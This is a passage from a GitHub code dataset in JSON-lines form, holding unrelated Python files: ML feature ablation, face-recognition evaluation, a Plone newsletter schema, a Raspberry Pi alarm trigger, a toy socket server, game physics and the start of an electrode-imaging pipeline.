y_train, X_dev, y_dev, X_test, y_test\n\n\ndef feature_ablation(model, feature_lst, X_train, y_train, X_dev, y_dev):\n \"\"\"Feature selection algorithm from given features\n\n Args:\n model (sklearn model): A sklearn model used to evaluate feature selection\n feature_lst (list): A list of d feature names\n X_train (numpy array): X_train with shape n * d\n y_train (numpy array): y_train with shape n * 1\n X_dev (numpy array): X_dev with shape m * d\n y_dev (numpy array): y_dev with shape m * 1\n \"\"\"\n features = feature_lst[:]\n model.fit(X_train, y_train)\n best_score = model.score(X_dev, y_dev)\n print(f\"--- The preliminary score is {best_score} ---\")\n\n for i in range(len(features)):\n current_best_score = 0\n remove_feature = None\n remove_idx = None\n\n # try deleting each feature at a time and compare the validation score\n for idx, feature in enumerate(features):\n X_train_enc_ablation = np.delete(X_train, idx, 1)\n X_dev_enc_ablation = np.delete(X_dev, idx, 1)\n\n model.fit(X_train_enc_ablation, y_train)\n score = model.score(X_dev_enc_ablation, y_dev)\n print(f\"Try removing feature: {feature}...\")\n print(f\" ....reaching validation score: {score}\")\n # track the best validation score when removing a feature\n if score > current_best_score:\n current_best_score = score\n remove_feature = feature\n remove_idx = idx\n\n # if removing any of the feature results in lower score, we should stop\n # because all of them are useful\n if current_best_score < best_score:\n break\n best_score = current_best_score\n print(\"***************************************\")\n print(f\"Removed feature: {remove_feature}\")\n print(f\"The best score so far is {best_score}\")\n print(\"***************************************\")\n\n X_train = np.delete(X_train, remove_idx, 1)\n X_dev = np.delete(X_dev, remove_idx, 1)\n features.pop(remove_idx)\n print(\"--- Stop removing features ---\")\n print(f\"The best score we can reach after feature ablation is {best_score}\")\n return features\n\n\ntrain_set = load_dataset(TRAIN_FILEPATH)\ndev_set = load_dataset(DEV_FILEPATH)\ntest_set = load_dataset(TEST_FILEPATH)\n\n# transform the feature_dict to numpy array\nX_train, y_train, X_dev, y_dev, X_test, y_test = split_dataset_and_extract_features(\n train_set, dev_set, test_set, ZIP_FILEPATH\n)\nvectorizer = DictVectorizer()\nX_train_enc = vectorizer.fit_transform(X_train).toarray()\nX_dev_enc = vectorizer.fit_transform(X_dev).toarray()\nX_test_enc = vectorizer.fit_transform(X_test).toarray()\n\nfeatures = [k for k, v in sorted(vectorizer.vocabulary_.items(), key=lambda x: x[1])]\n\n# init a decision tree model and calculate the preliminary score\nmodel_dt = DecisionTreeClassifier(max_depth=3, random_state=123)\nmodel_dt.fit(X_train_enc, y_train)\nprint(f\"The preliminary score is {model_dt.score(X_dev_enc, y_dev)}.\")\n\n# feature ablation\nfeature_ablation(model_dt, features, X_train_enc, y_train, X_dev_enc, y_dev)\n\nv = vectorizer.vocabulary_\nselected_feature_idx = [\n v[\"avg_word_length\"],\n v[\"if_mention_european\"],\n v[\"stopwords_counts\"],\n v[\"tag_X_count\"],\n v[\"web_words_count\"],\n]\nprint(f\"The mapping between the feature and index in DictVectorizer:{v}\")\nprint(f\"Selected index of features are {selected_feature_idx}\")\n\nX_train_new = X_train_enc[:, selected_feature_idx]\nX_test_new = X_test_enc[:, selected_feature_idx]\n\n# train decision tree with reduced feature set\nmodel_dt.fit(X_train_new, y_train)\nmodel_dt.score(X_test_new, y_test)\n\n# report\nmodel_dt_reduced = DecisionTreeClassifier(max_depth=3, random_state=123)\nmodel_dt_reduced.fit(X_train_new, y_train)\n\nreduced_features = [\n \"avg_word_length\",\n \"if_mention_european\",\n \"stopwords_counts\",\n \"tag_X_count\",\n \"web_words_count\",\n]\n\n# Visualize decision tree\nfig, ax = plt.subplots(figsize=(12, 12))\ntree.plot_tree(model_dt_reduced, feature_names=reduced_features, fontsize=10)\nplt.show()\n\n# correlation between features and target\ndf = pd.DataFrame(data=X_train_enc, columns=features)\ncor = df.corr()\nplt.figure(figsize=(15, 15))\nsns.set(font_scale=0.8)\nsns.heatmap(cor, annot=True, cmap=plt.cm.Blues)","repo_name":"Jeremyzzzz/nlp_learner_native_lang_prediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"1263128812","text":"import subprocess\nimport os\n\nwhile True:\n exists = os.path.isfile('/home/pi/trigger.txt')\n\n if exists:\n print(\"caught\")\n os.system(\"sudo rm trigger.txt\")\n subprocess.call([\"/home/pi/.npm-global/bin/particle\", \"call\", \"2e002d000447363333343435\", \"bell\", \"true\"])\n","repo_name":"reidmeyer/222AlarmSystemFinal","sub_path":"hardware/PiFiles/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71509242113","text":"import os\nimport random\nfrom tqdm import tqdm\nimport argparse\n\nimport pandas as pd\nfrom deepface.DeepFace import represent, build_model\nfrom deepface.commons import distance, functions\n\nimport keras.backend as K\n\ncfg = K.tf.compat.v1.ConfigProto()\ncfg.gpu_options.allow_growth = True\nK.set_session(K.tf.compat.v1.Session(config=cfg))\n\nfrom commons import img_name_generator, models\n\nNUM_NEGATIVE_IDENT_ = 6\nNUM_RESULT_DECIMAL_PLACES = 6\n\n\ndef args_input():\n parser = argparse.ArgumentParser(description=\"Prepare img db from CelebA dataset\")\n parser.add_argument(\n \"-n\",\n \"--num_identities_to_test\",\n default=1000,\n help=\"Specify number identities in db to test\",\n )\n parser.add_argument(\n \"-m\",\n \"--model_name\",\n default=\"VGG-Face\",\n help=\"\"\"Select one of recognition models: \n VGG-Face, OpenFace, Facenet, Facenet512, DeepFace, DeepID, Dlib, ArcFace, SFace\"\"\",\n )\n parser.add_argument(\n \"-f\",\n \"--test_db_dir\",\n default=\"db-imgs\",\n help=\"\"\"Specify path to dir with imgs to test\"\"\",\n )\n parser.add_argument(\n \"-c\",\n \"--num_clean\",\n default=51,\n help=\"\"\"Specify num iterations to clear sesion\"\"\",\n )\n return parser.parse_args()\n\n\ndef args_parser(args):\n model_name = args.model_name\n if model_name not in models:\n raise ValueError(\"Incorrect model name\")\n num_ident = int(args.num_identities_to_test)\n if num_ident < 2:\n raise ValueError(\"To small number of img to test\")\n db_test_path = args.test_db_dir\n num_clean = int(args.num_clean)\n return model_name, num_ident, db_test_path, num_clean\n\n\ndef generat_pair():\n l = random.randint(1, num_ident_to_test)\n m = random.randint(4, 9)\n return l, m\n\n\ndef generate_negative_pair(j, k):\n negative_names = []\n while len(negative_names) < NUM_NEGATIVE_IDENT_:\n l, m = generat_pair()\n if j == l:\n continue\n else:\n negative_name = img_name_generator(l, m)\n if negative_name in negative_names:\n continue\n else:\n negative_names.append(negative_name)\n return negative_names\n\ndef negative_pairs_generator(negative_pairs_path):\n negative_pairs = []\n for ident in range(1, num_ident_to_test + 1):\n for i in range(1, 4):\n negative_names = generate_negative_pair(ident, i)\n negative_pairs.append(negative_names)\n df = pd.DataFrame(negative_pairs)\n df.to_csv(negative_pairs_path)\n\nif __name__ == \"__main__\":\n args = args_input()\n selected_model, num_ident_to_test, db_test_path, num_clean = args_parser(args)\n negative_pairs_path = os.path.join(\"CelebA\", \"negative_paris.csv\")\n db_to_test = os.path.join(\"CelebA\", db_test_path)\n db_identity = os.path.join(\"CelebA\", \"db-ident\")\n if db_test_path == \"img_prepared\" or db_test_path == \"db-imgs\":\n noise_and_value = \"\"\n else:\n noise_and_value = db_test_path.replace(\"db-imgs\", \"\")\n\n if not os.path.exists(negative_pairs_path):\n raise FileNotFoundError(\"No negative file\")\n negative_pairs_generator(negative_pairs_path)\n \n negative_paris = pd.read_csv(negative_pairs_path)\n\n positives_distances = []\n negatives_distances = []\n\n model = build_model(selected_model)\n target_size = functions.find_target_size(model_name=selected_model)\n\n print(\"-\" * 40)\n print(\"Selected to test: \", noise_and_value)\n\n print(\"Analizing positive pairs\")\n for ident in tqdm(range(1, num_ident_to_test + 1)):\n if ident % num_clean == 0:\n K.clear_session()\n for i in range(1, 4):\n img_obj = functions.extract_faces(\n os.path.join(db_identity, img_name_generator(ident, i)),\n target_size=target_size,\n detector_backend=\"skip\",\n )\n res = represent(\n img_obj[0][0], model_name=selected_model, detector_backend=\"skip\"\n )\n embedding_org = res[0][\"embedding\"]\n for j in range(4, 10):\n img_obj = functions.extract_faces(\n os.path.join(db_to_test, img_name_generator(ident, j)),\n target_size=target_size,\n detector_backend=\"skip\",\n )\n res = represent(\n img_obj[0][0], model_name=selected_model, detector_backend=\"skip\"\n )\n embedding = res[0][\"embedding\"]\n dist_cosine = distance.findCosineDistance(embedding_org, embedding)\n dist = distance.findEuclideanDistance(embedding_org, embedding)\n dist_l2 = distance.findEuclideanDistance(\n distance.l2_normalize(embedding_org),\n distance.l2_normalize(embedding),\n )\n\n dist_cosine_rounded = round(dist_cosine, NUM_RESULT_DECIMAL_PLACES)\n dist_rounded = round(dist, NUM_RESULT_DECIMAL_PLACES)\n dist_rounded_l2 = round(dist_l2, NUM_RESULT_DECIMAL_PLACES)\n positives_distances.append(\n [dist_cosine_rounded, dist_rounded, dist_rounded_l2]\n )\n\n pos_dist = pd.DataFrame(\n positives_distances, columns=[\"distance_cos\", \"distance_euc\", \"distance\"]\n )\n pos_dist[\"decision\"] = \"Yes\"\n\n print(\"Analizing negative pairs\")\n for ident in tqdm(range(1, num_ident_to_test + 1)):\n if ident % num_clean == 0:\n K.clear_session()\n for i in range(1, 4):\n img_obj = functions.extract_faces(\n os.path.join(db_identity, img_name_generator(ident, i)),\n target_size=target_size,\n detector_backend=\"skip\",\n )\n res = represent(\n img_obj[0][0], model_name=selected_model, detector_backend=\"skip\"\n )\n embedding_org = res[0][\"embedding\"]\n idx = (ident - 1) * 3 + (i - 1)\n for j in negative_paris.iloc[idx].to_list()[1:]:\n img_obj = functions.extract_faces(\n os.path.join(db_to_test, j),\n target_size=target_size,\n detector_backend=\"skip\",\n )\n res = represent(\n img_obj[0][0], model_name=selected_model, detector_backend=\"skip\"\n )\n embedding = res[0][\"embedding\"]\n dist_cosine = distance.findCosineDistance(embedding_org, embedding)\n dist = distance.findEuclideanDistance(embedding_org, embedding)\n dist_l2 = distance.findEuclideanDistance(\n distance.l2_normalize(embedding_org),\n distance.l2_normalize(embedding),\n )\n\n dist_cosine_rounded = round(dist_cosine, NUM_RESULT_DECIMAL_PLACES)\n dist_rounded = round(dist, NUM_RESULT_DECIMAL_PLACES)\n dist_rounded_l2 = round(dist_l2, NUM_RESULT_DECIMAL_PLACES)\n negatives_distances.append(\n [dist_cosine_rounded, dist_rounded, dist_rounded_l2]\n )\n\n neg_dist = pd.DataFrame(\n negatives_distances, columns=[\"distance_cos\", \"distance_euc\", \"distance\"]\n )\n neg_dist[\"decision\"] = \"No\"\n\n df = pd.concat([pos_dist, neg_dist]).reset_index(drop=True)\n\n result_file_name = \"result_\" + selected_model + noise_and_value + \".csv\"\n if not os.path.exists(\"results\"):\n os.makedirs(\"results\")\n result_file_name = os.path.join(\"results\", result_file_name)\n df.to_csv(result_file_name)\n print(\"TEST END\\nFile with results saved\")","repo_name":"wojter/master-thesis","sub_path":"facelytics/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":7706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27540431407","text":"import socket\n\nHOSTNAME=socket.gethostname()\nPORT=6969\n\ns=socket.socket()\ns.bind((HOSTNAME, PORT))\ns.listen(5)\n\nprint('Started server at %s:%d'%(HOSTNAME,PORT))\n\nwhile 1:\n con, addr=s.accept()\n message=con.recv(1024)\n print('Received message from address %s'%str(addr))\n print('Message: %s'%str(message))\n con.send(b'Thank you for using the testserrver application!')\n con.close()\n print('Connection closed with %s'%str(addr))\n print()\n","repo_name":"plasmatic1/archived-projects","sub_path":"Other Python/testserver.py","file_name":"testserver.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31045813455","text":"import pandas as pd\nimport re\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nX = []\nY = []\ncsv = '/Users/shiran/workspace/datasets/tmdb_5000_movies.csv'\nfor line in open(csv):\n x1, x2, y = line.split(',')\n X.append([1.0, float(x1), float(x2)]) # add the bias term\n Y.append(float(y))\n\n\n# let's turn X and Y into numpy arrays since that will be useful later\nX = np.array(X)\nY = np.array(Y)\n\nw = np.linalg.solve(np.dot(X.transpose(), X), np.dot(X.transpose(), Y))\n\nyHat = np.dot(X, w)\n\nd1 = Y - yHat\nd2 = Y - Y.mean()\nr2 = 1 - d1.dot(d1) / d2.dot(d2)\n\nprint(r2)\n##### plot\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.scatter(X[:, 0], X[:, 1], Y)\nplt.show()\n\n\n\n#\n#\n# # let's plot the data to see what it looks like\n# fig = plt.figure()\n# ax = fig.add_subplot(111, projection='3d')\n#\n# d = pd.read_csv(csv, header=None)\n# arr = d.as_matrix()\n# X_2 = d[[0, 1]].as_matrix()\n# Y_2 = d[[2]].as_matrix()\n#\n# print(X.shape)\n# print(X_2.shape)\n","repo_name":"shirans/classes","sub_path":"lazy_prog/1_linear_regression_lazy_prog/multidim/linear2d_imdb.py","file_name":"linear2d_imdb.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44249100101","text":"# -*- coding: utf-8 -*-\n# from z3c.form.browser.radio import RadioFieldWidget\nfrom plone import api\nfrom plone import schema\nfrom plone.app import textfield\nfrom plone.app.z3cform.widget import SingleCheckBoxBoolFieldWidget\nfrom plone.autoform import directives\nfrom plone.dexterity.content import Container\nfrom plone.namedfile import field as namedfile\nfrom plone.registry.interfaces import IRegistry\nfrom plone.supermodel import model\nfrom Products.EasyNewsletter import _\nfrom Products.EasyNewsletter import config\nfrom z3c import relationfield\nfrom zope.component import getUtility\nfrom zope.interface import implementer\n\n\ndef get_default_output_template():\n registry = getUtility(IRegistry)\n templates_keys = list(registry.get(\"Products.EasyNewsletter.output_templates\"))\n if not templates_keys:\n return\n if \"output_default\" not in templates_keys:\n default_tmpl_key = \"output_default\"\n else:\n default_tmpl_key = templates_keys[0]\n return default_tmpl_key\n\n\ndef _get_base_path(path):\n base_obj = api.content.get(path)\n if not base_obj:\n return\n base_path = \"/\".join(base_obj.getPhysicalPath())\n return base_path\n\n\ndef get_content_aggregation_sources_base_path(context):\n return _get_base_path(\"/\")\n\n\nclass INewsletter(model.Schema):\n \"\"\"Marker interface and Dexterity Python Schema for Newsletter\"\"\"\n\n # model.fieldset(\n # 'default',\n # label=u'Default',\n # fields=[\n # 'sender_email',\n # 'sender_name',\n # 'test_email',\n # 'content_aggregation_sources',\n # 'output_template',\n # ],\n # )\n\n model.fieldset(\n \"personalization\",\n label=_(\"Personalization\"),\n fields=[\n \"salutations\",\n \"fullname_fallback\",\n \"unsubscribe_string\",\n \"subscriber_confirmation_mail_subject\",\n \"subscriber_confirmation_mail_text\",\n \"default_prologue\",\n \"default_epilogue\",\n \"banner\",\n \"logo\",\n ],\n )\n\n model.fieldset(\n \"recipients\", label=_(\"Recipients\"), fields=[\"exclude_all_subscribers\"]\n )\n\n sender_email = schema.TextLine(\n title=_(\"ENL_label_senderEmail\", default=\"Sender email\"),\n description=_(\n \"ENL_help_senderEmail\",\n default=\"Default for the sender address of the newsletters.\",\n ),\n required=True,\n )\n\n sender_name = schema.TextLine(\n title=_(\"ENL_label_senderName\", default=\"Sender name\"),\n description=_(\n \"ENL_help_senderName\",\n default=\"Default for the sender name of the newsletters.\",\n ),\n required=True,\n )\n\n test_email = schema.TextLine(\n title=_(\"ENL_label_testEmail\", default=\"Test email\"),\n description=_(\n \"ENL_help_testEmail\", default=\"Default for the test email address.\"\n ),\n required=True,\n )\n\n directives.widget(\n \"content_aggregation_sources\",\n pattern_options={\n \"basePath\": get_content_aggregation_sources_base_path,\n \"selectableTypes\": [\"Collection\"],\n },\n )\n content_aggregation_sources = relationfield.schema.RelationList(\n title=_(\n \"ENL_content_aggregation_sources_label\",\n default=\"Content aggregation sources\",\n ),\n description=_(\n \"ENL_content_aggregation_sources_desc\",\n default=\"Choose sources to aggregate newsletter content from.\",\n ),\n value_type=relationfield.schema.RelationChoice(\n title=\"content_aggretation_source\",\n vocabulary=\"plone.app.vocabularies.Catalog\",\n ),\n required=False,\n )\n\n salutations = schema.List(\n title=_(\"ENL_label_salutations\", default=\"Subscriber Salutations.\"),\n description=_(\n \"ENL_help_salutations\",\n default='Define here possible salutations for subscriber. \\\n One salutation per line in the form of: \"mr|Dear Mr.\". \\\n The left hand value \"mr\" or \"ms\" is mapped to salutation \\\n of each subscriber and then the right hand value, which \\\n you can customize is used as salutation.',\n ),\n default=[\"mr|Dear Mr.\", \"ms|Dear Ms.\", \"default|Dear\"],\n value_type=schema.TextLine(title=\"salutation\"),\n required=True,\n )\n\n fullname_fallback = schema.TextLine(\n title=_(\n \"ENL_label_fullname_fallback\",\n default=\"Fallback for subscribers without a name.\",\n ),\n description=_(\n \"ENL_help_fullname_fallback\",\n default=\"This will be used if the subscriber has no fullname.\",\n ),\n default=\"Sir or Madam\",\n required=True,\n )\n\n unsubscribe_string = schema.TextLine(\n title=_(\n \"ENL_label_unsubscribe_string\", default=\"Text for the 'unsubscribe' link\"\n ),\n description=_(\n \"ENL_help_unsubscribe_string\",\n default=\"This will replace the placeholder {{UNSUBSCRIBE}}.\",\n ),\n default=\"Click here to unsubscribe\",\n required=True,\n )\n\n # Make sure you import: plone.namedfile\n banner = namedfile.NamedBlobImage(\n title=_(\"ENL_image_label\", default=\"Banner image\"),\n description=_(\n \"ENL_image_desc\",\n default=\"Banner image, you can include in the templates by\"\n + \"\\n adding the {{banner}} placeholder into it.\"\n + \" By default it should be 600x200 pixel.\",\n ),\n required=False,\n )\n\n # Make sure you import: plone.namedfile\n logo = namedfile.NamedBlobImage(\n title=_(\"ENL_logo_label\", default=\"Logo image\"),\n description=_(\n \"ENL_logo_desc\",\n default=\"Logo image, you can include in the templates by\\n\"\n + \" adding the {{logo}} placeholder into it.\",\n ),\n required=False,\n )\n\n # Make sure to import: plone.app.textfield\n default_prologue = textfield.RichText(\n title=_(\"ENL_label_default_header\", default=\"Prologue\"),\n description=_(\n \"ENL_description_text_header\",\n default=\"The default prologue text. This is used as a default \\\n for new issues. You can use placeholders like\\\n {{subscriber_salutation}} and {{unsubscribe}} here.\",\n ),\n default=_(\"{{subscriber_salutation}}
\"),\n required=False,\n )\n\n # Make sure to import: plone.app.textfield\n default_epilogue = textfield.RichText(\n title=_(\"ENL_label_default_footer\", default=\"Epilogue\"),\n description=_(\n \"ENL_description_text_footer\",\n default=\"The default epilogue text. This is used as a default \\\n for new issues. You can use placeholders like\\\n {{subscriber_salutation}} and {{unsubscribe}} here.\",\n ),\n default=_(\"

Community Newsletter for Plone

\\n{{unsubscribe}}\"),\n required=False,\n )\n\n # Make sure you import:\n # plone.app.z3cform.widget.SingleCheckBoxBoolFieldWidget\n directives.widget(exclude_all_subscribers=SingleCheckBoxBoolFieldWidget)\n exclude_all_subscribers = schema.Bool(\n title=_(\"ENL_label_excludeAllSubscribers\", default=\"Exclude all subscribers\"),\n description=_(\n \"ENL_help_excludeAllSubscribers\",\n default=\"If checked, the newsletter/mailing will not be send \\\n to all subscribers inside the newsletter. Changing this \\\n setting does not affect already existing issues.\",\n ),\n required=False,\n default=False,\n )\n\n output_template = schema.Choice(\n title=_(\"enl_label_output_template\", default=\"Output template\"),\n description=_(\n \"enl_help_output_template\",\n default=\"Choose the template to render the email. \",\n ),\n vocabulary=\"Products.EasyNewsletter.OutputTemplates\",\n defaultFactory=get_default_output_template,\n required=True,\n )\n\n subscriber_confirmation_mail_subject = schema.TextLine(\n title=_(\n \"ENL_label_subscriber_confirmation_mail_subject\",\n default=\"Subscriber confirmation mail subject\",\n ),\n description=_(\n \"ENL_description_subscriber_confirmation_mail_subject\",\n default=\"Text used for confirmation email subject. You can \\\n customize the text, but it should include the \\\n placeholder: ${portal_url}!\",\n ),\n default=config.DEFAULT_SUBSCRIBER_CONFIRMATION_MAIL_SUBJECT,\n required=True,\n )\n\n subscriber_confirmation_mail_text = schema.Text(\n title=_(\n \"ENL_label_subscriber_confirmation_mail_text\",\n default=\"Subscriber confirmation mail text\",\n ),\n description=_(\n \"ENL_description_subscriber_confirmation_mail_text\",\n default=\"Text used for confirmation email. You can customize \\\n the text, but it should include the placeholders: \\\n ${portal_url}, ${subscriber_email} and \\\n ${confirmation_url}!\",\n ),\n default=config.DEFAULT_SUBSCRIBER_CONFIRMATION_MAIL_TEXT,\n required=True,\n )\n\n directives.order_after(content_aggregation_sources=\"IBasic.title\")\n directives.order_after(test_email=\"IBasic.title\")\n directives.order_after(sender_name=\"IBasic.title\")\n directives.order_after(sender_email=\"IBasic.title\")\n directives.order_after(output_template=\"IRichText.text\")\n\n\n@implementer(INewsletter)\nclass Newsletter(Container):\n \"\"\" \"\"\"\n\n def get_newsletter(self):\n return self\n\n # bbb to support ATCT way, needs to be removed in v5.x:\n getNewsletter = get_newsletter\n","repo_name":"collective/Products.EasyNewsletter","sub_path":"src/Products/EasyNewsletter/content/newsletter.py","file_name":"newsletter.py","file_ext":"py","file_size_in_byte":9843,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"26629237011","text":"from setuptools import find_packages, setup\n\nsetup_requires = []\n\ninstall_requires = [\n \"natsort\",\n \"numpy\",\n \"psutil\",\n \"scikit-learn\",\n \"torch\",\n \"torchvision\",\n \"tqdm\",\n \"matplotlib\",\n \"albumentations\",\n 'opencv-python-headless<4.3.0;python_version<\"3.7\"', # because it takes too long to build\n 'opencv-python-headless;python_version>=\"3.8\"',\n 'imageio==2.15.0;python_version<\"3.7\"', # dependency of moviepy\n \"moviepy\",\n \"PyYAML>=5.1\",\n \"types-PyYAML\",\n \"gdown\",\n]\n\nextra_all_requires = [\"pybullet\", \"tinyfk<0.6\"]\n\nsetup(\n name=\"mohou\",\n version=\"0.5.9\",\n description=\"Visuomotor imitation learning framework\",\n author=\"Hirokazu Ishida\",\n author_email=\"h-ishida@jsk.imi.i.u-tokyo.ac.jp\",\n url=\"https://github.com/HiroIshida/mohou\",\n long_description=open(\"README.md\").read(),\n long_description_content_type=\"text/markdown\",\n license=\"MIT\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"Natural Language :: English\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3.8\",\n ],\n install_requires=install_requires,\n extras_require={\"all\": extra_all_requires},\n packages=find_packages(exclude=(\"tests\", \"docs\")),\n package_data={\"mohou\": [\"py.typed\"]},\n)\n","repo_name":"HiroIshida/mohou","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"5074312742","text":"import configjson as config\nimport math\n\n\ndef clamp(minimum, x, maximum):\n return max(minimum, min(x, maximum))\n\n\nclass User:\n def __init__(self, pos, camera, geom):\n self.pos = pos\n self.look_at = [0.5, 0.11, 0.5]\n self.camera = camera\n self.mouse_position = [config.window_info.window_size[0] / 2, config.window_info.window_size[1] / 2]\n self.geom_ref = geom\n self.vertical_speed = 0\n self.look_angle = 0\n\n def update_camera(self):\n self.camera.pos = [self.pos[0], self.pos[1] + 3.375, self.pos[2]]\n factor = 2 * math.pi / config.window_info.window_size[0]\n angle = self.mouse_position[0] * factor\n self.look_angle = angle\n\n yfactor = 6.0 / config.window_info.window_size[1]\n val = -((self.mouse_position[1] * yfactor) - 3)\n\n self.camera.look_direction = [math.sin(angle), val, math.cos(angle)]\n\n def mouse_delta(self, dx, dy):\n self.mouse_position[0] += dx * (config.mouse_sensitivity / 3)\n self.mouse_position[1] += dy * (config.mouse_sensitivity / 3)\n self.mouse_position[0] %= config.window_info.window_size[0]\n self.mouse_position[1] = clamp(0, self.mouse_position[1], config.window_info.window_size[1])\n\n def physics_tick(self, dx, dz):\n self.vertical_speed -= config.gravity\n self.vertical_speed = max(config.terminal_velocity, self.vertical_speed)\n px, py, pz = self.pos[0] + dx, self.pos[1], self.pos[2] + dz\n for i in self.geom_ref.geoms:\n px, py, pz = i.pushcube.check_and_modify(px, py, pz)\n self.pos = [px, py, pz]\n px, py, pz = self.pos[0], self.pos[1] + self.vertical_speed, self.pos[2]\n for i in self.geom_ref.geoms:\n px, py, pz = i.pushcube.check_and_modify(px, py, pz)\n self.pos = [px, py, pz]\n for i in self.geom_ref.geoms:\n a = i.pushcube.check_and_modify(px, py + 3.375, pz)\n px = a[0]\n pz = a[2]\n self.pos = [px, py, pz]\n\n if self.pos[1] < -10.0:\n self.pos = [0, 3, 0]\n if self.pos[1] > 250.0:\n self.pos = [0, 3, 0]\n self.vertical_speed /= 2\n\n def walk_forward(self):\n return self.camera.look_direction[0] * config.walking_speed, self.camera.look_direction[\n 2] * config.walking_speed\n\n def angle_offset(self, angle):\n angle = math.radians(angle)\n return math.sin(self.look_angle + angle) * config.walking_speed, math.cos(\n self.look_angle + angle) * config.walking_speed\n\n def jump(self):\n self.vertical_speed += config.jump_speed\n","repo_name":"mincrmatt12/PyCONCa2017","sub_path":"3dLandscapeModel/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14490318804","text":"from werken import tids\nimport pytest\n\n\n@pytest.mark.parametrize(\"value, expected\", [\n (0, \"0000000000\"),\n (9, \"0000000009\"),\n (10, \"000000000A\"),\n (36, \"000000000a\"),\n (61, \"000000000z\"),\n (62, \"0000000010\"),\n (tids.MAX_ID, \"zzzzzzzzzz\")])\ndef test_id_from_int(value, expected):\n assert tids.id_from_int(value) == expected\n\n\ndef test_id_from_int_min():\n with pytest.raises(ValueError, match=\"id must not be negative\"):\n tids.id_from_int(-1)\n\n\ndef test_id_from_int_max():\n with pytest.raises(ValueError, match=\"id too large\"):\n tids.id_from_int(tids.MAX_ID + 1)\n","repo_name":"werken-xyz/werken","sub_path":"src/werken/tests/test_tids.py","file_name":"test_tids.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23546437831","text":"def calculate_answer(S, K):\n S_len = len(S)\n flips = 0\n answer = ''\n all_plus = True\n for i in xrange(S_len):\n if S[i] == '-':\n all_plus = False\n if (S_len - i) >= K:\n k_flag = True\n for k in xrange(i, K + i):\n if S[k] == '+':\n k_flag = False\n S[k] = '-'\n else:\n S[k] = '+'\n all_plus = k_flag\n flips += 1\n else:\n answer = 'IMPOSSIBLE'\n break\n if all_plus:\n answer = str(flips)\n else:\n answer = 'IMPOSSIBLE'\n return answer\n\nin_f = 'A-large.in'\nout_f = 'A-large-out.in'\nwith open(in_f, 'r') as in_file, open(out_f, 'w') as out_file:\n test_cases = int(in_file.readline().strip())\n for t in xrange(1, test_cases + 1):\n s, k = in_file.readline().split(' ')\n S = list(s)\n K = int(k)\n answer = calculate_answer(S, K)\n out_file.write('Case #' + str(t) + ': ' + answer + '\\n')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3440.py","file_name":"3440.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40378830254","text":"#! /usr/bin/python3.7\n# -- coding: utf-8 -- **\n\n### Here are a set of functions used in elec_pipe\n### and a set of qthread class for elec_main_gui\n\nimport sys\nimport os\nimport re\nimport math\nimport numpy as np\nfrom numpy import ndarray\nimport nibabel as nib\nfrom scipy import ndimage\nfrom sklearn.mixture import GaussianMixture as GMM\nfrom sklearn.linear_model import LinearRegression, Lasso\nfrom PyQt5.QtCore import QThread, pyqtSignal\n# import matplotlib\n# matplotlib.use(\"Qt5Agg\")\n# from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n# from matplotlib.figure import Figure\n# from matplotlib import pyplot as plt\n# from mpl_toolkits.mplot3d import Axes3D, art3d\n# import electrode\n\nCMD_Hough3D = './hough-3d-lines/hough3dlines'\n\ndef run(cmd):\n \"\"\"\n Print the command.\n Execute a command string on the shell (on bash).\n \n Parameters\n ----------\n cmd : str\n Command to be sent to the shell.\n \"\"\"\n print(f\"Running shell command: {cmd}\")\n os.system(cmd)\n print(f\"Done!\\n\")\n\ndef align(inp, ref, xfm=None, out=None, dof=12, searchrad=True, bins=256, interp=None, cost=\"mutualinfo\", sch=None, wmseg=None, init=None, finesearch=None,):\n \"\"\"Aligns two images using FSLs flirt function and stores the transform between them\n Parameters\n ----------\n inp : str\n path to input image being altered to align with the reference image as a nifti image file\n ref : str\n path to reference image being aligned to as a nifti image file\n xfm : str, optional\n where to save the 4x4 affine matrix containing the transform between two images, by default None\n out : str, optional\n determines whether the image will be automatically aligned and where the resulting image will be saved, by default None\n dof : int, optional\n the number of degrees of free dome of the alignment, by default 12\n searchrad : bool, optional\n whether to use the predefined searchradius parameter (180 degree sweep in x, y, and z), by default True\n bins : int, optional\n number of histogram bins, by default 256\n interp : str, optional\n interpolation method to be used (trilinear,nearestneighbour,sinc,spline), by default None\n cost : str, optional\n cost function to be used in alignment (mutualinfo, corratio, normcorr, normmi, leastsq, labeldiff, or bbr), by default \"mutualinfo\"\n sch : str, optional\n the optional FLIRT schedule, by default None\n wmseg : str, optional\n an optional white-matter segmentation for bbr, by default None\n init : str, optional\n an initial guess of an alignment in the form of the path to a matrix file, by default 